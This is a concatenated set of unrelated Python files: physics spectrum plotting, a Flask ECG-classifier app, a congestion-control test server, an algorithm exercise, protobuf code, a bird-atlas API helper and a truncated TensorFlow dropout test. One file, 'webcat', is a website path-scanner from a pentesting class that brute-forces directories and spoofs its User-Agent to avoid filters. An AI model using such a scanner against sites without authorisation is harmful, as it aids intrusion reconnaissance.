xytext=(6.5,50))
for tick in ax.xaxis.get_major_ticks():
tick.label.set_fontsize(18)
for tick in ax.yaxis.get_major_ticks():
tick.label.set_fontsize(18)
if PID=='pos':
plt.xlabel('Prompt Energy (MeV)')
plt.ylabel(r'$dN/dE_{prompt}$ (TNU/MeV)')
plt.title(r'Event Spectrum as a function of prompt positron energy')
if PID=='nu':
plt.xlabel('Energy (MeV)')
plt.ylabel(r'$dN/dE_{\nu}$ (TNU/MeV)')
plt.title(r'Neutrino event spectrum')
else:
print("PID not recognized. Not making plot")
return
plt.show()
def CAspectrumPlot(energies,spectrum):
'''
Takes an array evaluated at energy points and plots them vs. energy.
Specific to Canadian spectrum to have labels ready.
'''
num_points = len(energies)
opacity = 0.9
fig, ax = plt.subplots()
#plt.gcf().subplots_adjust(bottom=0.2)
plt.plot(energies, spectrum, alpha=opacity, color='b')
plt.xlabel('Energy (MeV)')
plt.ylabel(r'(Sum of Oscillated Spectra$m^{-2}$)')
plt.title(r'Plot of oscillated neutrino spectrum at input location for all' + \
'Canadian plants')
#plt.xticks(index + bar_width, x, y=0.001)
#plt.legend()
#plt.tight_layout() #could use instead of the subplots_adjust line
plt.show()
def plotSumOscSpectrum(OscSpectra):
"""
Plots the "core_number"s spectrum in the passed in UnoscSpectra class using
Matplotlib.pyplot.
"""
num_points = len(OscSpectra.Summed_Spectra)
spectrum = OscSpectra.Summed_Spectra
energies = OscSpectra.E_arr
opacity = 0.9
fig, ax = plt.subplots()
#plt.gcf().subplots_adjust(bottom=0.2)
plt.plot(energies, spectrum, alpha=opacity, color='g')
plt.xlabel('Energy (MeV)')
plt.ylabel(r'(Sum of Oscillated Spectra$m^{-2}$)')
plt.title(r'Plot of oscillated Core Spectrums for Plant ' + \
str(OscSpectra.ReacDetails.index) + ' at input location')
#plt.xticks(index + bar_width, x, y=0.001)
#plt.legend()
#plt.tight_layout() #could use instead of the subplots_adjust line
plt.show()
def plotCoreOscSpectrum(core_number,OscSpectra):
"""
Plots the "core_number"s spectrum in the passed in UnoscSpectra class using
Matplotlib.pyplot.
"""
num_points = len(OscSpectra.Osc_Spectra[core_number])
spectrum = OscSpectra.Osc_Spectra[core_number]
energies = OscSpectra.E_arr
opacity = 0.9
fig, ax = plt.subplots()
#plt.gcf().subplots_adjust(bottom=0.2)
plt.plot(energies, spectrum, alpha=opacity, color='g')
plt.xlabel('Energy (MeV)')
plt.ylabel(r'Unoscillated spectra ($m^{-2}$)')
plt.title(r'Plot of oscillated Core Spectrum for the ' + str(core_number) + \
r'th core of Plant ' + str(OscSpectra.ReacDetails.index) + ' at input location')
#plt.xticks(index + bar_width, x, y=0.001)
#plt.legend()
#plt.tight_layout() #could use instead of the subplots_adjust line
plt.show()
def plotCoreUnoscSpectrum(core_number,UnoscSpectra):
"""
Plots the "core_number"s spectrum in the passed in UnoscSpectra class using
Matplotlib.pyplot.
"""
num_points = len(UnoscSpectra.Unosc_Spectra[core_number])
spectrum = UnoscSpectra.Unosc_Spectra[core_number]
energies = UnoscSpectra.E_arr
opacity = 0.9
fig, ax = plt.subplots()
#plt.gcf().subplots_adjust(bottom=0.2)
plt.plot(energies, spectrum, alpha=opacity, color='g')
plt.xlabel('Energy (MeV)')
plt.ylabel(r'Unoscillated spectra ($m^{-2}$)')
plt.title(r'Plot of Unoscillated Core Spectrum for the ' + str(core_number) + \
r'th core of Plant ' + str(UnoscSpectra.ReacDetails.index) + ' at input location')
#plt.xticks(index + bar_width, x, y=0.001)
#plt.legend()
#plt.tight_layout() #could use instead of the subplots_adjust line
plt.show()
if __name__ == '__main__':
print("No main loop implemented. It's just a library, get real.")
|
<filename>app/app.py
import os
import urllib.request
import pandas as pd
import numpy as np
from flask import Flask, flash, request, redirect, render_template
from werkzeug.utils import secure_filename
import json
import plotly
import plotly.figure_factory as ff
import plotly.offline as py
import plotly.graph_objs as go
import configparser
#import cufflinks as cf
#cf.go_offline()
import keras
from keras.models import load_model
from keras.models import Sequential
from keras.layers import Dense, Dropout, Flatten
from keras.layers import Conv1D, MaxPooling1D, GlobalAveragePooling1D
from keras.optimizers import SGD
from keras.utils import to_categorical
from sklearn.model_selection import train_test_split
import argparse
from keras import backend as K
#STATIC_DIR = os.path.abspath('../ECG_Analysis/app/static')
app = Flask(__name__,static_url_path='/static')
app.secret_key = os.urandom(24)
ALLOWED_EXTENSIONS = set(['csv', 'xlsx','xls'])
#print(os.getcwd())
def get_default_config():
conf = configparser.ConfigParser()
conf.read('../conf/config.ini')
config = conf['DEFAULT']
return config
conf = get_default_config()
deploy_type = conf['deploy_type']
print(deploy_type)
hostname = conf['hostname']
port = conf['port']
@app.route('/')
def upload_form():
"""
Method implementing the home url, it calls the index.html to render a home page view
@param
@return: Rendered html view
"""
return render_template('index.html',hostname=hostname, port=port)
def allowed_file(filename):
"""
Check if the input file is with the correct extension.
@param file - Input analysis file / demo string
@return: Boolean after checking the file extension
"""
return '.' in filename and filename.rsplit('.', 1)[1].lower() in ALLOWED_EXTENSIONS
@app.route('/uploader', methods=['GET','POST'])
def uploader():
if request.method == 'POST':
# check if the post request has the file part
test_flag = ''
if 'file' in request.files:
test_flag = 'file'
else:
test_flag = 'demo'
demo_data = request.form['samplevalue']
if test_flag == 'demo' :
demo_data = demo_data.split(',')
demo_data = [ float(val) for val in demo_data]
out_df, graphJSON = predictionHandler(demo_data = demo_data)
#print("Show the shape of output DF")
#print(out_df.shape)
colorscale = [[0, '#4d004c'],[.5, '#f2e5ff'],[1, '#ffffff']]
table = ff.create_table(out_df, colorscale=colorscale, height_constant = 20)
table.to_html()
pp_table = table.to_html()
return render_template('response.html', table = pp_table, graphplot = graphJSON)
else:
file = request.files['file']
if file.filename == '':
flash('No file selected for uploading')
return redirect(request.url)
if file and allowed_file(file.filename):
filename = secure_filename(file.filename)
file.save(filename)
flash('File successfully uploaded...call the handler now..')
extension = file.filename.split('.')[1]
plot_index = request.form['plot_sample']
out_df, graphJSON = predictionHandler(file.filename,extension,plot_index= plot_index)
colorscale = [[0, '#4d004c'],[.5, '#f2e5ff'],[1, '#ffffff']]
table = ff.create_table(out_df, colorscale=colorscale, height_constant = 20)
table.to_html()
pp_table = table.to_html()
return render_template('response.html', table = pp_table, graphplot = graphJSON)
else:
flash('Allowed file types are csv,xls,xlsx')
return redirect(request.url)
def predictionHandler(test_file=False,extension='', plot_index=1, demo_data=[]):
"""
Method to call the inference on the model and to create the graph objects
@param test_fileile - Input analysis file
@param plot_index - The index of the data file to be plotted
@param demo_data - The demo data string
@return - Valid dataframe, graph json object
"""
plot_index = int(plot_index)
if test_file:
if extension == "csv":
df = pd.read_csv(test_file)
elif (extension == "xls" or extension == "xlsx"):
df = pd.read_excel(test_file)
else:
raise ValueError('Input file with unexpected extension, please use csv, xlsx,xls files')
test_rec = df.values
test_rec = test_rec.reshape(test_rec.shape[0], test_rec.shape[1],1)
else:
test_rec = np.array(demo_data)
test_rec = test_rec.reshape(1, test_rec.shape[0],1)
df_data = np.array(demo_data)
df_data = df_data.reshape(1,df_data.shape[0])
df = pd.DataFrame(data=df_data)
model_ECG_loaded = load_model('../models/model_ECG_final.h5')
model_MI_loaded = load_model('../models/model_MI_final.h5')
print("models loaded...")
out_classes = model_ECG_loaded.predict(test_rec)
print("prediction completed..")
ECG_class = np.argmax(out_classes,axis=1)
out_classes = model_MI_loaded.predict(test_rec)
MI_class = np.argmax(out_classes,axis=1)
out_df = pd.DataFrame(columns =['ECG_Class', 'MI_Class'], data = np.array([ECG_class, MI_class]).transpose())
out_df['User_id'] = out_df.index+1
out_df = out_df[['User_id', 'ECG_Class','MI_Class']]
ecg_clas_mapper = {0:'N', 1:'S', 2:'V', 3:'F',4:'Q'}
MI_class_mapper = {0:'Normal', 1:'Abnormal'}
out_df.ECG_Class = out_df.ECG_Class.map(ecg_clas_mapper)
out_df.MI_Class = out_df.MI_Class.map(MI_class_mapper)
ecg_class = out_df.iloc[plot_index-1].ECG_Class
mi_class = out_df.iloc[plot_index-1].MI_Class
if mi_class == 0:
mi_class = 'Normal'
else:
mi_class = 'Abnormality'
graphs = createECGGraph(df,plot_index,ecg_class,mi_class)
graphJSON = json.dumps(graphs, cls=plotly.utils.PlotlyJSONEncoder)
return out_df,graphJSON
def createECGGraph(df, plot_index, ecg_class, mi_class):
"""
Method to create the line plot graph object
@param df - The intermediate dataframe with predicted classes
@param plot_index - The index of the data file to be plotted
@param ecg_class - The ecg calss identified for the index being plotted
@param mi_class - The Myocardial Infraction calss identified for the index being plotted
@return: Valid plotly graph object
"""
df_index = plot_index-1
xvals = list(range(0, df.iloc[df_index].count()))
yvals = list(df.iloc[df_index].values)
graphs = [
{
'data': [
{
"x": xvals,
"y":yvals,
"type": "scatter"
}
],
'layout': {
'title': f"ECG Readings for the record# {plot_index}, ECG class = {ecg_class} <br> MI tests shows {mi_class}",
'yaxis': {
'title': "ECG Readings"
},
'xaxis': {
'title': "Time instance"
}
}
}
]
return graphs
if __name__ == "__main__":
app.run(host='0.0.0.0', port=port,threaded=False) |
<reponame>comnetsAD/ALCC
import json
import random
import socket
import subprocess
import sys
import time
import traceback
import analyze_pcap
std_ports = {
"ctrl": 6000,
"udp_punch": 6001
}
MAX_CTRL_MSG_SIZE = 1024 * 1024
run_time=30
res_dir="results"
server_config = {
"available_cong_algs": ["copa", "cubic", "bbr"]
}
cong_algs = {
"cubic" : {"prog": "iperf3", "port": "5201", "time": str(run_time)},
"bbr" : {"prog": "iperf3", "port": "5201", "time": str(run_time)},
"copa" : {"prog": "receiver", "time": str(run_time+5)}
}
# Ctrl socket
ctrl_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
ctrl_sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
ctrl_sock.bind(("0.0.0.0", std_ports["ctrl"]))
ctrl_sock.listen(10)
while True:
try:
print("Waiting for connection")
ctrl_conn, ctrl_client_addr = ctrl_sock.accept()
conn_id = str(random.randint(0, 1e9))
print("Connected to client '%s'. Assigned id '%s'" % (str(ctrl_client_addr), conn_id))
while True:
request_str = ctrl_conn.recv(MAX_CTRL_MSG_SIZE)
if len(request_str) == 0: continue
print("Got", request_str)
request = json.loads(request_str)
if request["request"] == "get_config":
config = server_config
config["conn_id"] = conn_id
ctrl_conn.sendall(json.dumps(server_config))
elif request["request"] == "test_cong_alg":
if request["cong_alg"] in ["cubic", "bbr"]:
if request["cong_alg"] == "cubic":
subprocess.call(["sudo", "sysctl", "-w", "net.ipv4.tcp_congestion_control=cubic"])
subprocess.call(["sudo", "sysctl", "-w", "net.core.default_qdisc=pfifo_fast"])
elif request["cong_alg"] == "bbr":
subprocess.call(["sudo", "sysctl", "-w", "net.ipv4.tcp_congestion_control=bbr"])
subprocess.call(["sudo", "sysctl", "-w", "net.core.default_qdisc=fq"])
else:
assert(False)
subprocess.Popen(('sudo tcpdump -i eth0 -w %s/%s-%s-%s' % (res_dir, ctrl_client_addr[0], conn_id, request["cong_alg"])).split(' '))
ctrl_conn.sendall(json.dumps(cong_algs[request["cong_alg"]]))
subprocess.call(["iperf3", "-s", "--one-off"])
subprocess.call(['sudo', 'pkill', 'tcpdump'])
subprocess.call(['sudo', 'pkill', 'tcpdump'])
elif request["cong_alg"] in ["copa"]:
subprocess.call(["sudo", "sysctl", "-w", "net.core.default_qdisc=pfifo_fast"])
udp_sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
udp_sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
udp_sock.bind(("", std_ports["udp_punch"]))
ctrl_conn.sendall(json.dumps(cong_algs[request["cong_alg"]]))
_, addr = udp_sock.recvfrom(1024)
print("UDP punched %s" % str(addr))
udp_sock.sendto("Sesame", addr)
udp_sock.close()
time.sleep(5) # Give the client time to set things up
subprocess.Popen(('sudo tcpdump -i eth0 -w %s/%s-%s-%s' % (res_dir, ctrl_client_addr[0], conn_id, request["cong_alg"])).split(' '))
subprocess.call(["./sender",
"serverip="+addr[0],
"serverport="+str(addr[1]),
"sourceport="+str(std_ports["udp_punch"]),
"onduration="+str(int(run_time * 1000)),
"cctype=markovian",
"delta_conf=auto",
"offduration=0",
"traffic_params=deterministic,num_cycles=1"])
print("Copa done")
subprocess.call(['sudo', 'pkill', 'tcpdump'])
subprocess.call(['sudo', 'pkill', 'tcpdump'])
else:
print("Request for unrecognized algorithm '%s'" % request["cong_alg"])
elif request["request"] == "close":
print("Closing connection with client '%s'" % str(ctrl_client_addr))
ctrl_conn.close()
break
results = analyze_pcap.parse_file('%s/%s-%s-%s' % (res_dir, ctrl_client_addr[0], conn_id, request["cong_alg"]))
print(ctrl_client_addr[0], conn_id, request["cong_alg"], results)
except Exception:
print("Error while communicating with client.")
print(traceback.format_exc())
|
<reponame>livlikwav/Algorithms
'''
7 7
2 0 0 0 1 1 0
0 0 1 0 1 2 0
0 1 1 0 1 0 0
0 1 0 0 0 0 0
0 0 0 0 0 1 1
0 1 0 0 0 0 0
0 1 0 0 0 0 0
'''
import copy
N, M = map(int, input().split())
data = [list(map(int, input().split())) for _ in range(N)]
temp = [[0] * M for _ in range(N)]
result = 0
dx = [0, 0, -1, +1]
dy = [-1, +1, 0, 0]
# debug
# print(N, M)
# print(data)
# print(temp)
# print(result)
def set_walls(map:list, pos:tuple, count:int) -> None:
global result
x, y = pos
for i in range(len(map)):
temp[i] = copy.deepcopy(map[i])
if count == 3:
result = max(result, spread_virus(temp))
return
if y + 1 < M: # go right
set_walls(temp, (x, y+1), count)
temp[x][y+1] = 1
set_walls(temp, (x, y+1), count + 1)
elif x + 1 < N: # new line
set_walls(temp, (x+1, 0), count)
temp[x+1][0] = 1
set_walls(temp, (x+1, 0), count + 1)
else: # (N-1, M-1)
return
def spread_virus(map: int) -> int:
for i in range(len(map)):
temp[i] = copy.deepcopy(map[i])
visited = [[False] * M for _ in range(N)]
for i in range(N):
for j in range(M):
if not visited[i][j]:
if temp[i][j] == 2:
visited[i][j] = True
dfs(temp, visited, (i, j))
# count safe area
count = 0
for i in range(N):
for j in range(M):
if temp[i][j] == 0:
count += 1
return count
def dfs(temp, visited, pos):
x, y = pos
for i in range(4):
nx = x + dx[i]
ny = y + dy[i]
if 0 <= nx < N and 0 <= ny < M:
if not visited[nx][ny]:
if temp[nx][ny] == 0:
visited[nx][ny] = True
temp[nx][ny] = 2
dfs(temp, visited, (nx, ny))
set_walls(data, (0,0), 0)
print(result)
'''
<Answer>
n, m = map(int, input().split())
data = [] # 초기 맵 리스트
temp = [[0] * m for _ in range(n)] # 벽을 설치한 뒤의 맵 리스트
for _ in range(n):
data.append(list(map(int, input().split())))
# 4가지 이동방향에 대한 리스트
dx = [-1, 0, 1, 0]
dy = [0, 1, 0, -1]
result = 0
# DFS를 통해 각 바이러스가 사방으로 퍼지도록 하기
def virus(x, y):
for i in range(4):
nx = x + dx[i]
ny = y + dy[i]
# 상 하 좌 우 중에서 바이러스가 퍼질 수 있는 경우
if nx >= 0 and nx < n and ny >= 0 and ny < m:
if temp[nx][ny] == 0:
# 해당 위치에 바이러스 배치하고, 다시 재귀적으로 수행
temp[nx][ny] = 2
virus(nx, ny)
# 현재 맵에서 안전 영역의 크기 계산하는 메서드
def get_score():
score = 0
for i in range(n):
for j in range(m):
if temp[i][j] == 0:
score += 1
return score
# DFS를 이용해 울타리를 설치하면서, 매번 안전 영역의 크기 계산
def dfs(count):
global result
# 울타리가 3개 설치된 경우
if count == 3:
for i in range(n):
for j in range(m):
temp[i][j] = data[i][j]
# 각 바이러스의 위치에서 전파 진행
for i in range(n):
for j in range(m):
if temp[i][j] == 2:
virus(i, j)
# 안전 영역의 최댓값 계산
result = max(result, get_score())
return
# 빈 공간에 울타리 설치
for i in range(n):
for j in range(m):
if data[i][j] == 0:
data[i][j] = 1
count += 1
dfs(count)
data[i][j] = 0
count -= 1
dfs(0)
print(result)
''' |
#!/usr/bin/env python
# -*- coding: utf8 -*-
"""
=^.^= WEBCAT =^.^=
webcat is a simple website scanner for interesting
files / directories. webcat was written while attending
a pentesting class, therefore it's really quite simple.
Version: 0.3
+ added status filter
+ header changed for avoiding filters
Version: 0.2
+ cleanup
Version: 0.1
+ initial version
Written by <NAME>
https://www.kangafoo.de
"""
import sys
import argparse
import os
import requests
def clear():
"""
clear() -> no return
just clear screen for linux and windows
"""
os.system("cls" if os.name == "nt" else "clear")
def infoheader():
"""
infoheader() -> no return
prints header logo and avatar target name and CID
"""
clear()
print("=^.^= WEBCAT =^.^=")
print("-"*50)
print("->> Target: %s" %(options.target))
print("-"*50)
def printhelp():
"""
printhelp() -> no return
prints header logo and displays help parameters
"""
clear();
print("=^.^= WEBCAT =^.^=")
parser.print_help()
def createlist(myfile,mytarget):
"""
createlist(string) -> list
reads a file with files / directories and combines it with target for scan.
returns the resulting list
"""
lines = open(myfile, "r").readlines()
newlist = []
for line in lines:
line = line.replace("\n", "") #rem break
line = line.replace("\r", "") #rem return
line = mytarget + "/" + line
newlist.append(line)
return newlist
def scantarget(host,status_filter):
"""
scantarget(string) -> no return
scan for a given file or directory on host and print result
"""
user_agent = {
'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
'Accept-Language': 'en-US,en;q=0.8',
'Accept-Encoding': 'gzip'
}
scan = requests.get(host, headers=user_agent)
if (verb):
print("["+str(scan.status_code)+"] "+host)
else:
if scan.status_code in status_filter:
print("["+str(scan.status_code)+"] "+host)
if __name__=="__main__":
parser = argparse.ArgumentParser()
parser.add_argument("-t", "--target", dest="target",default="",help="specify the target host e.g. http://www.google.de")
parser.add_argument("-f", "--file", dest="file",default="",help="specify the filename with files and directories to scan for")
parser.add_argument("-v", "--verbose",dest="verbose_switch",default=False, action="store_true",help="show all results")
parser.add_argument("-d", "--display",dest="display_list",default=[200],nargs='+', type=int,help="display just certain status codes")
options = parser.parse_args()
if len(sys.argv) < 2:
printhelp()
quit()
else:
target = options.target
file = options.file
verb = options.verbose_switch
filter_list = options.display_list
infoheader()
listtoscan = createlist(file,target)
for scanitem in listtoscan:
scantarget(scanitem,filter_list)
|
# -*- coding: utf-8 -*-
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: cs3/ocm/core/v1beta1/resources.proto
"""Generated protocol buffer code."""
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
from cs3.types.v1beta1 import types_pb2 as cs3_dot_types_dot_v1beta1_dot_types__pb2
DESCRIPTOR = _descriptor.FileDescriptor(
name='cs3/ocm/core/v1beta1/resources.proto',
package='cs3.ocm.core.v1beta1',
syntax='proto3',
serialized_options=b'\n\030com.cs3.ocm.core.v1beta1B\016ResourcesProtoP\001Z\013corev1beta1\242\002\003COC\252\002\024Cs3.Ocm.Core.V1Beta1\312\002\024Cs3\\Ocm\\Core\\V1Beta1',
create_key=_descriptor._internal_create_key,
serialized_pb=b'\n$cs3/ocm/core/v1beta1/resources.proto\x12\x14\x63s3.ocm.core.v1beta1\x1a\x1d\x63s3/types/v1beta1/types.proto\"C\n\x08Protocol\x12\x0c\n\x04name\x18\x01 \x01(\t\x12)\n\x06opaque\x18\x02 \x01(\x0b\x32\x19.cs3.types.v1beta1.OpaqueBm\n\x18\x63om.cs3.ocm.core.v1beta1B\x0eResourcesProtoP\x01Z\x0b\x63orev1beta1\xa2\x02\x03\x43OC\xaa\x02\x14\x43s3.Ocm.Core.V1Beta1\xca\x02\x14\x43s3\\Ocm\\Core\\V1Beta1b\x06proto3'
,
dependencies=[cs3_dot_types_dot_v1beta1_dot_types__pb2.DESCRIPTOR,])
_PROTOCOL = _descriptor.Descriptor(
name='Protocol',
full_name='cs3.ocm.core.v1beta1.Protocol',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='name', full_name='cs3.ocm.core.v1beta1.Protocol.name', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='opaque', full_name='cs3.ocm.core.v1beta1.Protocol.opaque', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=93,
serialized_end=160,
)
_PROTOCOL.fields_by_name['opaque'].message_type = cs3_dot_types_dot_v1beta1_dot_types__pb2._OPAQUE
DESCRIPTOR.message_types_by_name['Protocol'] = _PROTOCOL
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
Protocol = _reflection.GeneratedProtocolMessageType('Protocol', (_message.Message,), {
'DESCRIPTOR' : _PROTOCOL,
'__module__' : 'cs3.ocm.core.v1beta1.resources_pb2'
# @@protoc_insertion_point(class_scope:cs3.ocm.core.v1beta1.Protocol)
})
_sym_db.RegisterMessage(Protocol)
DESCRIPTOR._options = None
# @@protoc_insertion_point(module_scope)
|
from dataclasses import replace
import atlas.common as common
import json
def observation_coordinates(square_id):
url = f"https://api.laji.fi/v0/warehouse/query/unit/list?selected=gathering.conversions.wgs84CenterPoint.lat%2Cgathering.conversions.wgs84CenterPoint.lon%2Cgathering.coordinatesVerbatim&pageSize=1000&page=1&cache=true&taxonId=MX.37580&useIdentificationAnnotations=true&includeSubTaxa=true&includeNonValidTaxa=true&time=2022%2F2025&individualCountMin=1&coordinates={square_id}%3AYKJ&qualityIssues=NO_ISSUES&atlasClass=MY.atlasClassEnumB%2CMY.atlasClassEnumC%2CMY.atlasClassEnumD&coordinateAccuracyMax=5000&access_token=";
data_dict = common.fetch_finbif_api(url)
obs_count = data_dict["total"]
coord_string = ""
for obs in data_dict["results"]:
# Todo: skip those with just center coordinates
# if (isset($obs['gathering']['coordinatesVerbatim'])) {
lat = obs['gathering']['conversions']['wgs84CenterPoint']['lat']
lon = obs['gathering']['conversions']['wgs84CenterPoint']['lon']
coord_string = coord_string + f"[{lat},{lon}],\n"
return coord_string, obs_count
def coordinate_accuracy_html_loop(data):
html = ""
for accuracy, count in data.items():
html = html + accuracy + " m: " + str(count) + " havaintoa, "
return html[0:-2]
def coordinate_accuracy_html(data):
over10000 = data.get("over", 0) + data.get("25000", 0) + data.get("10000", 0)
under10000 =data.get("5000", 0)
under1000 =data.get("1000", 0)
under100 = data.get("100", 0)
under10 = data.get("10", 0) + data.get("1", 0)
mappable = under10000 + under1000 + under100 + under10
total = over10000 + mappable
if 0 == total:
return "Ruutulta ei ole vielä havaintoja"
mappable_percentage = round(mappable / total * 100, 1)
html = f"Kartalla näytetään <strong>{mappable_percentage} %</strong> ruudun <strong>{total} havainnosta</strong>. Havaintojen määrä eri tarkkuusluokissa: "
html = html + "yli 10000 m: <strong>" + str(over10000) + "</strong>, "
html = html + "5000 m: <strong>" + str(under10000) + "</strong>, "
html = html + "1000 m: <strong>" + str(under1000) + "</strong>, "
html = html + "100 m: <strong>" + str(under100) + "</strong>, "
html = html + "alle 10 m: <strong>" + str(under10) + "</strong>, "
return html[0:-2]
def main(square_id_untrusted):
html = dict()
square_id = common.valid_square_id(square_id_untrusted)
html["square_id"] = square_id
neighbour_ids = common.neighbour_ids(square_id)
html["neighbour_ids"] = neighbour_ids
coordinates, mappable_obs_count = observation_coordinates(square_id)
html["coordinates"] = coordinates
html["mappable_obs_count"] = mappable_obs_count
coordinate_accuracy_data, total_obs_count = common.coordinate_accuracy_data(square_id)
html["accuracies"] = coordinate_accuracy_html(coordinate_accuracy_data)
# html["total_obs_count"] = collection_counts(square_id)
square_name, society, centerpoint, cornerpoints = common.square_info(square_id)
# Todo: Make heading the same way as on squareform
html["heading"] = f"{square_id} {square_name}"
html["centerpoint"] = centerpoint
html["cornerpoints"] = cornerpoints
return html
|
# Copyright 2021 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# =============================================================================
import numpy as np
from tensorflow.compiler.plugin.poplar.tests import test_utils as tu
from tensorflow.python.client import session as sl
from tensorflow.python.data.ops.dataset_ops import Dataset
from tensorflow.python.framework import ops
from tensorflow.python.framework import test_util
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import gradients_impl
from tensorflow.python.ops import init_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import variable_scope
from tensorflow.python.ops import variables
from tensorflow.python.platform import googletest
from tensorflow.python.training import gradient_descent
from tensorflow.python import ipu
from tensorflow.python.ipu.tests import pipelining_test_util
from tensorflow.compiler.plugin.poplar.ops import gen_poprand_ops
# Call the gen op directly in order to access the seed.
def _dropout(x, noise_shape=None):
return gen_poprand_ops.ipu_dropout(x,
rate=0.5,
scale=1.0,
noise_shape=noise_shape)
class DropoutTest(test_util.TensorFlowTestCase):
@tu.test_uses_ipus(num_ipus=8)
@test_util.deprecated_graph_mode_only
def testDropoutInPipeline(self):
def dataset_fn():
dataset = tu.create_single_increasing_dataset(7, shape=[32])
return dataset.batch(batch_size=32, drop_remainder=True)
pipeline_depth = 20
repeat_count = 2
def stage1(x):
with variable_scope.variable_scope("vs", use_resource=True):
weight = variable_scope.get_variable(
"w0",
shape=[32, 32],
dtype=np.float32,
initializer=init_ops.ones_initializer())
x = math_ops.matmul(x, weight)
x, s1, _ = _dropout(x)
return x, s1
def stage2(x, s1):
with variable_scope.variable_scope("vs", use_resource=True):
weight = variable_scope.get_variable(
"w1",
shape=[32, 32],
dtype=np.float32,
initializer=init_ops.ones_initializer())
x = math_ops.matmul(x, weight)
x, s2, _ = _dropout(x)
return x, s1, s2
def stage3(x, s1, s2):
with variable_scope.variable_scope("vs", use_resource=True):
weight = variable_scope.get_variable(
"w2",
shape=[32, 32],
dtype=np.float32,
initializer=init_ops.ones_initializer())
x, s3, _ = _dropout(x)
x = math_ops.matmul(x, weight)
return x, s1, s2, s3
def stage4(x, s1, s2, s3):
with variable_scope.variable_scope("vs", use_resource=True):
weight = variable_scope.get_variable(
"w3",
shape=[32, 32],
dtype=np.float32,
initializer=init_ops.ones_initializer())
x = math_ops.matmul(x, weight)
x, s4, _ = _dropout(x)
return x, s1, s2, s3, s4
def stage5(x, s1, s2, s3, s4):
with variable_scope.variable_scope("vs", use_resource=True):
weight = variable_scope.get_variable(
"w4",
shape=[32, 32],
dtype=np.float32,
initializer=init_ops.ones_initializer())
x = math_ops.matmul(x, weight)
_, s5, _ = _dropout(x, noise_shape=[32, 1])
return s1, s2, s3, s4, s5
output = pipelining_test_util.PipelineTester.pipeline_on_ipu(
[stage1, stage2, stage3, stage4, stage5],
lambda: [], [],
repeat_count,
pipeline_depth,
dataset_fn,
None,
self,
10000,
recomp=False,
schedule=ipu.pipelining_ops.PipelineSchedule.Grouped,
device_mapping=[0, 2, 1, 3, 1],
replication_factor=2)
s1, s2, s3, s4, s5 = output
for seeds in (s1, s2, s3, s4, s5):
assert len(seeds) == pipeline_depth * repeat_count
for i, s in enumerate(seeds):
# Make sure the seeds are different between the replicas.
self.assertNotAllEqual(s[0], s[1])
# Make sure the seeds between iterations are different.
self.assertNotAllEqual(s, seeds[i - 1])
# Make sure the seeds are different between repeat counts.
self.assertNotAllEqual(s, seeds[i - pipeline_depth])
@tu.test_uses_ipus(num_ipus=1)
@test_util.deprecated_graph_mode_only
def testMultipleExecutionsNoUserSeed(self):
def model(x):
return gen_poprand_ops.ipu_dropout(x, rate=0.5, scale=1.0)[0:2]
with ops.device('cpu'):
inp = array_ops.placeholder(np.float32, [2], name="data")
with ops.device("/device:IPU:0"):
out = ipu.ipu_compiler.compile(model, [inp])
cfg = ipu.config.IPUConfig()
cfg.auto_select_ipus = 1
tu.add_hw_ci_connection_options(cfg)
cfg.configure_ipu_system()
with sl.Session() as sess:
_, s1 = sess.run(out, {inp: [2, 4]})
_, s2 = sess.run(out, {inp: [2, 4]})
self.assertNotAllEqual(s1, s2)
@tu.test_uses_ipus(num_ipus=1)
@test_util.deprecated_graph_mode_only
def testMultipleExecutionsUserSeed(self):
def model(x):
return gen_poprand_ops.ipu_dropout_with_seed(x, [10, 10],
rate=0.5,
scale=1.0)[0:2]
with ops.device('cpu'):
inp = array_ops.placeholder(np.float32, [2], name="data")
with ops.device("/device:IPU:0"):
out = ipu.ipu_compiler.compile(model, [inp])
cfg = ipu.config.IPUConfig()
cfg.auto_select_ipus = 1
tu.add_hw_ci_connection_options(cfg)
cfg.configure_ipu_system()
with sl.Session() as sess:
_, s1 = sess.run(out, {inp: [2, 4]})
_, s2 = sess.run(out, {inp: [2, 4]})
self.assertAllEqual(s1, s2)
@tu.test_uses_ipus(num_ipus=1)
@test_util.deprecated_graph_mode_only
def testFwdBwdSeedMatches(self):
def model():
with variable_scope.variable_scope("vs", use_resource=True):
w = variable_scope.get_variable(
"w",
shape=[2, 4],
dtype=np.float32,
initializer=init_ops.ones_initializer())
